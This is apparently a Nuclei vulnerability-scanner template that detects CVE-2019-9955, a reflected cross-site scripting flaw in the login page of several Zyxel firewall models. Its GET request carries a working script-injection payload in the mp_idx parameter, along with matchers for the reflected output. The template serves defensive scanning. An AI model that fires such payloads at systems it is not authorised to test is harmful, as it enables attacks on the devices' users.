nuclei-templates/http/cves/2019/CVE-2019-9955.yaml

42 lines
1.7 KiB
YAML

id: CVE-2019-9955
info:
name: Zyxel - Cross-Site Scripting
author: pdteam
severity: medium
description: Zyxel ATP200, ATP500, ATP800, USG20-VPN, USG20W-VPN, USG40, USG40W, USG60, USG60W, USG110, USG210, USG310, USG1100, USG1900, USG2200-VPN, ZyWALL 110, ZyWALL 310, and ZyWALL 1100 devices contain a reflected cross-site scripting vulnerability on the security firewall login page via the mp_idx parameter.
remediation: |
Apply the latest security patches provided by Zyxel to fix the Cross-Site Scripting vulnerability (CVE-2019-9955).
reference:
- http://packetstormsecurity.com/files/152525/Zyxel-ZyWall-Cross-Site-Scripting.html
- https://www.exploit-db.com/exploits/46706/
- https://www.securitymetrics.com/blog/Zyxel-Devices-Vulnerable-Cross-Site-Scripting-Login-page
- https://www.zyxel.com/support/reflected-cross-site-scripting-vulnerability-of-firewalls.shtml
- https://nvd.nist.gov/vuln/detail/CVE-2019-9955
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-9955
cwe-id: CWE-79
epss-score: 0.0798
epss-percentile: 0.93611
cpe: cpe:2.3:o:zyxel:atp200_firmware:4.31:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: zyxel
product: atp200_firmware
tags: zyxel,packetstorm,seclists,edb,cve,cve2019,xss
http:
- method: GET
path:
- "{{BaseURL}}/?mp_idx=%22;alert(%271%27);//"
matchers:
- type: word
part: body
words:
- "\";alert('1');//"
- "<title>Welcome</title>"
condition: and
# digest: 4a0a00473045022100a8368debe7ba62f1a36cf90415b3b5b33d7c8509a538a3ac20d6958a4a532e170220160b0d505f7b6dbdefb9ee7b5509a607514d48188cdc774d860f04272e4efb86:922c64590222798bb761d5b6d8e72950